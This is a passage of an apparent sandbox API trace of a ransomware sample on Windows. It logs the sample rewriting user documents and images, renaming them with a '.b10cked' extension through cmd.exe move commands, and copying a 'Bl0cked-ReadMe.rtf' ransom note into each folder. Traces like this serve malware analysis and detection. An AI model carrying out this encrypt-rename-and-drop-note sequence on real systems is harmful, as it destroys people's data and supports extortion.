dwThreadId=0xf70)) returned 1 [0138.512] CloseHandle (hObject=0x110) returned 1 [0138.512] CloseHandle (hObject=0x114) returned 1 [0138.512] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\", cchLength=0x33 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\") returned 0x33 [0138.512] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\", cchLength=0x58 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\") returned 0x58 [0138.512] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\", cchCount1=51, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\", cchCount2=88) returned 1 [0138.512] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\", cchLength=0x33 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\") returned 0x33 [0138.512] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0138.512] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\", cchCount1=51, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0138.512] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0138.513] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0138.513] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0138.513] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\") returned 0x2a [0138.513] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0138.513] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0138.513] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0xdf0, dwThreadId=0xdc8)) returned 1 [0138.565] CloseHandle (hObject=0x110) returned 1 [0138.565] CloseHandle (hObject=0x114) returned 1 [0138.565] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\bl0cked-readme.rtf")) returned 0x20 [0138.565] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0138.565] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0138.565] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0138.565] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.565] ReleaseMutex (hMutex=0xf8) returned 1 [0138.565] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.565] ReleaseMutex (hMutex=0xf8) returned 1 [0138.565] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.565] ReleaseMutex (hMutex=0xf8) returned 1 [0138.565] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.565] ReleaseMutex (hMutex=0xf8) returned 1 [0138.565] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\TAXJKdn0yOKX7tSSpc.pdf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\xj2fmd\\taxjkdn0yokx7tsspc.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0138.565] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.565] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd76c [0138.565] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.566] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19535473759) returned 1 [0138.566] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.566] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd76c [0138.566] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.566] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.566] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd76c [0138.566] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.566] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0138.566] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xd76c [0138.566] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0138.566] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.566] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd76c [0138.566] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.566] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.566] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd76c [0138.566] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.566] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.566] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd76c [0138.566] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.566] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.566] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd76c [0138.566] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.566] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.567] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd76c [0138.567] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.567] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.567] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd76c [0138.567] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.567] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xd284 [0138.567] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0138.568] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0138.568] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0138.568] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xd76c [0138.568] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0138.568] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0138.568] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0138.568] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xd76c [0138.568] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0138.568] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0138.568] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x6bb5, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x6bb5, lpOverlapped=0x0) returned 1 [0138.568] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0138.568] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x6bb5, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x6bb5, lpOverlapped=0x0) returned 1 [0138.569] SetFilePointer (in: hFile=0x114, lDistanceToMove=-27573, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x6bb7 [0138.569] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x6bb5, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x6bb5, lpOverlapped=0x0) returned 1 [0138.569] SetFilePointer (in: hFile=0x114, lDistanceToMove=-27573, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x6bb7 [0138.569] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x6bb5, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x6bb5, lpOverlapped=0x0) returned 1 [0138.573] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TAXJKdn0yOKX7tSSpc.pdf", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0138.573] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TAXJKdn0yOKX7tSSpc.pdf", cchWideChar=22, lpMultiByteStr=0x1328834, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TAXJKdn0yOKX7tSSpc.pdf", lpUsedDefaultChar=0x0) returned 22 [0138.573] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xd76c [0138.573] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0138.573] CloseHandle (hObject=0x114) returned 1 [0138.574] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\TAXJKdn0yOKX7tSSpc.pdf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKD~1.PDF") returned 0x34 [0138.574] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\") returned 0x28 [0138.574] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKD~1.PDF\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKdn0yOKX7tSSpc.pdf.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKD~1.PDF\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKdn0yOKX7tSSpc.pdf.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xdd4, dwThreadId=0xf78)) returned 1 [0138.589] CloseHandle (hObject=0x110) returned 1 [0138.589] CloseHandle (hObject=0x114) returned 1 [0138.589] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", cchLength=0x29 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\") returned 0x29 [0138.589] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\", cchLength=0x33 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\") returned 0x33 [0138.589] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\", cchCount1=41, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\", cchCount2=51) returned 3 [0138.589] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", cchLength=0x29 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\") returned 0x29 [0138.589] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0138.589] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\", cchCount1=41, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0138.589] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0138.590] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0138.590] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0138.590] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\") returned 0x28 [0138.590] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0138.590] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0138.590] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0xe90, dwThreadId=0xeb4)) returned 1 [0138.601] CloseHandle (hObject=0x110) returned 1 [0138.601] CloseHandle (hObject=0x114) returned 1 [0138.601] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\xj2fmd\\bl0cked-readme.rtf")) returned 0x20 [0138.601] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0138.601] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0138.601] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0138.601] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.601] ReleaseMutex (hMutex=0xf8) returned 1 [0138.601] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.602] ReleaseMutex (hMutex=0xf8) returned 1 [0138.602] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.602] ReleaseMutex (hMutex=0xf8) returned 1 [0138.602] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.602] ReleaseMutex (hMutex=0xf8) returned 1 [0138.602] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\bkwVSdvUcmd7uNf_5 x.jpg" (normalized: "c:\\users\\eebsym5\\desktop\\bkwvsdvucmd7unf_5 x.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0138.602] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.602] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12152 [0138.602] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.602] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19539114787) returned 1 [0138.602] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.602] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12152 [0138.602] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.602] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.602] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12152 [0138.602] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.602] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0138.602] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, 